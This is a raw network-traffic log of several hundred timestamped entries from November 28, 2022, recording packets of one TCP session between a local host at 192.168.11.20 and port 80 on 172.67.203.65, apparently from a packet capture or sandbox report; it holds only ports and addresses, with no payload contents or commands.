Nov 28, 2022 12:46:58.045615911 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.045627117 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.045627117 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.045638084 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.045646906 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.045726061 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.045754910 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.045767069 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.045777082 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.045790911 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.045803070 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.045814037 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.045824051 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.045835018 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.045845985 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.045856953 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.045861006 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.045866966 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.045877934 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.045888901 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.045898914 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.045909882 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.045919895 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.045931101 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.045941114 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.045952082 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.045963049 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.045973063 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.045988083 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.046001911 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.046003103 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.046014071 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.046024084 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.046041965 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.046053886 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.046058893 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.046065092 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.046076059 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.046088934 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.046099901 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.046111107 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.046122074 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.046132088 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.046143055 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.046154022 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.046164036 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.046175003 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.046185970 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.046196938 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.046202898 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.046206951 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.046217918 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.046255112 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.046266079 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.046278954 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.046289921 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.046300888 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.046312094 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.046323061 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.046334028 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.046391964 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.046499968 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.046510935 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.046523094 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.046766043 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.046770096 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.046777010 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.047049046 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.053081989 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.053184032 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.053195000 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.053205967 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.053277016 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.053288937 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.053299904 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.053311110 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.053322077 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.053344011 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.053380966 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.053415060 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.053489923 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.053567886 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.054152966 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.054259062 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.054311991 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.054323912 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.054336071 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.054347038 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.054358959 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.054363012 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.054420948 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.054420948 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.054436922 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.054450035 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.054461002 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.054471970 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.054485083 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.054496050 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.054506063 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.054517031 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.054527998 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.054574013 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.054584980 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.054594994 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.054605961 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.054610014 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.054616928 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.054672956 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.054681063 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.054692030 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.054702997 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.054713011 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.054723978 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.054734945 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.054745913 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.054780006 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.054790974 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.054801941 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.054804087 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.054830074 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.054840088 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.054960966 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.055058956 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.149925947 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.162302017 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.162404060 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.162415028 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.162425995 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.162462950 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.162489891 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.162503958 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.162513971 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.162524939 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.162535906 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.162545919 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.162570953 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.162583113 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.162594080 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.162604094 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.162615061 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.162625074 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.162636042 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.162646055 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.162657976 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.162667990 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.162678957 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.162688971 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.162699938 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.162700891 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.162710905 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.162718058 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.162837982 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.162941933 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.162952900 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.162964106 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.162975073 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.162985086 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.162998915 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.163009882 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.163019896 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.163021088 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.163031101 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.163042068 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.163052082 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.163063049 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.163074970 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.163085938 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.163096905 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.163106918 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.163117886 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.163129091 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.163139105 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.163140059 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.163150072 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.163187981 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.163187981 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.163198948 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.163209915 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.163220882 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.163230896 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.163242102 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.163253069 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.163269997 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.163281918 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.163291931 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.163304090 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.163315058 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.163316011 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.163326979 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.163337946 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.163348913 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.163362026 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.163372993 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.163422108 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.163444042 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.163455009 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.163465977 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.163475990 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.163486958 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.163497925 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.163507938 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.163518906 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.163530111 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.163542986 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.163554907 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.163564920 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.163575888 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.163588047 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.163603067 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.163614035 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.163621902 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.163705111 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.163739920 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.163752079 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.163762093 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.163773060 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.163784027 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.163794041 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.163805008 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.163815975 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.163826942 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.163837910 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.163847923 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.163858891 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.163861036 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.163870096 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.163882971 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.163893938 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.163904905 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.163916111 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.163927078 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.163983107 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.164011955 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.164016008 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.164024115 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.164035082 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.164045095 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.164057016 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.164072990 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.164083958 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.164094925 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.164104939 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.164115906 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.164127111 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.164138079 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.164149046 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.164150953 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.164159060 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.164170027 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.164180994 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.164194107 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.164206028 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.164216042 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.164227009 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.164238930 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.164251089 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.164262056 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.164272070 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.164283037 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.164285898 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.164294004 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.164328098 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.164354086 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.164364100 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.164376020 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.164386034 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.164397001 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.164407015 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.164417982 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.164428949 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.164438963 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.164453030 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.164540052 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.164551973 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.164561987 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.164572954 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.164583921 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.164593935 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.164604902 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.164614916 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.164625883 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.164635897 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.164647102 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.164655924 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.164658070 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.164669037 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.164679050 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.164690018 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.164700985 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.164710999 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.164721012 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.164731979 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.164731979 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.164741993 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.164793015 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.164803982 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.164814949 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.164825916 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.164836884 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.164848089 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.164858103 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.164869070 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.164880037 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.164891005 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.164901018 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.164906025 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.164911985 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.164922953 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.164933920 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.164995909 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.165046930 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.165057898 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.165069103 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.165079117 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.165090084 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.165101051 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.165111065 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.165122032 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.165122032 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.165132999 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.165143013 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.165153980 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.165164948 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.165275097 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.165302038 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.165313005 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.165323019 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.165333986 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.165344954 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.165347099 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.165357113 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.165373087 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.165384054 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.165395021 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.165405035 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.165416002 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.165426016 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.165436983 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.165447950 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.165455103 CET	49836	80	192.168.11.20	172.67.203.65
